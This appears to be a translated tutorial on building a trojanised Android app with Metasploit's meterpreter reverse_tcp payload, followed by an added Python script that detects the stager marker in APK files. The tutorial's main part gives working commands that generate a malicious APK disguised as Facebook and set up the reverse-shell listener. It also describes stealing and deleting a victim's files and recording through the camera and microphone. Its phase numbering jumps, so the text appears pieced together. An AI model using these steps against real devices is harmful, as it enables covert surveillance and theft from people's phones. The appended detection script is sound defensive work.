I state up front that with this guide I do not want to entice you to do anything like this against any person; this guide only wants to show how Google's antivirus (and others) are inefficient, and how they are not able to recognize a malware that has been known for many years, the so-called Meterpreter payload, Android version.
The payload is called android/meterpreter/reverse_tcp, and what does it do, you ask?
It creates a reverse connection between the Android device (it is, in effect, a real trojan) and our PC. So what can we do? The answer is simple: we can access the Android shell (the command line).
We can use commands like cd /storage/sdcard to access the internal memory of the phone and download all the victim's files, or eventually delete them; with sysinfo we get all the info on the device, the kernel and the language (java/java), the name (usually @localhost); we can take pictures with the camera, record with both the microphone and the camera... in short, not a few things, some of them as risky as in the first case.
First phase, malicious APK creation
Creating the malicious APK, with the payload android/meterpreter/reverse_tcp inside it, trying to make it look as innocuous as possible.
We use the command:
sudo msfpayload android/meterpreter/reverse_tcp LHOST=(Your IP) LPORT=(the one you want) R > /root/Desktop/facebook_4.0.apk (for Ubuntu: /home/Writing/facebook_4.0.apk)
Then we open a Linux shell and type the command shown above:
for LHOST, open another console, run ifconfig and note your LOCAL IP;
for LPORT, put 443.
sudo service postgresql start
sudo service metasploit start
sudo armitage
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST (PC local IP address)
set LPORT (the port set when the APK was created)
set ExitOnSession false
exploit -j
Fifth and final phase, we open the apk and execute various commands
We have set up the listener, so we can start the APK on the phone; we wait a few moments and here in Armitage our device appears with its IP address and the logo of the operating system, shown as "seized" by a lightning bolt.
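As an added defender-side example (not part of the original post): a Python triage check that flags an APK whose dex code references the com.metasploit.stage package the stock Android meterpreter stager is built from. The two sample archives are constructed inside the script; the marker is assumed to be missing from obfuscated or repackaged builds, so a miss is not a clean bill of health.

```python
import io
import zipfile

# Type descriptor of the package Metasploit's Android stager is built from
# (com.metasploit.stage). Obfuscated or repackaged builds may strip it,
# so this is a triage signal, not a verdict.
METERPRETER_MARKER = b"Lcom/metasploit/stage/"


def scan_apk(apk_bytes: bytes) -> dict:
    """Report which dex entries of an APK contain the stager marker.

    An APK is a zip archive; compiled code lives in classes.dex (and
    classes2.dex, ...), where class names appear as plain-text descriptors.
    """
    try:
        archive = zipfile.ZipFile(io.BytesIO(apk_bytes))
    except zipfile.BadZipFile:
        return {"valid_apk": False, "flagged": False, "hits": []}
    hits = []
    with archive:
        names = archive.namelist()
        for name in names:
            if name.lower().endswith(".dex") and METERPRETER_MARKER in archive.read(name):
                hits.append(name)
    return {
        "valid_apk": "AndroidManifest.xml" in names,
        "flagged": bool(hits),
        "hits": hits,
    }


def _build_sample(dex_payload: bytes) -> bytes:
    """Construct a minimal APK-shaped zip for demonstration (not a real app)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"<placeholder/>")
        z.writestr("classes.dex", dex_payload)
    return buf.getvalue()


# Constructed samples: one carrying the stager descriptor, one without it.
SUSPECT_APK = _build_sample(b"dex\n035\x00...Lcom/metasploit/stage/Payload;...")
BENIGN_APK = _build_sample(b"dex\n035\x00...Lcom/example/notes/MainActivity;...")

if __name__ == "__main__":
    for label, blob in (("suspect", SUSPECT_APK), ("benign", BENIGN_APK)):
        print(label, scan_apk(blob))
```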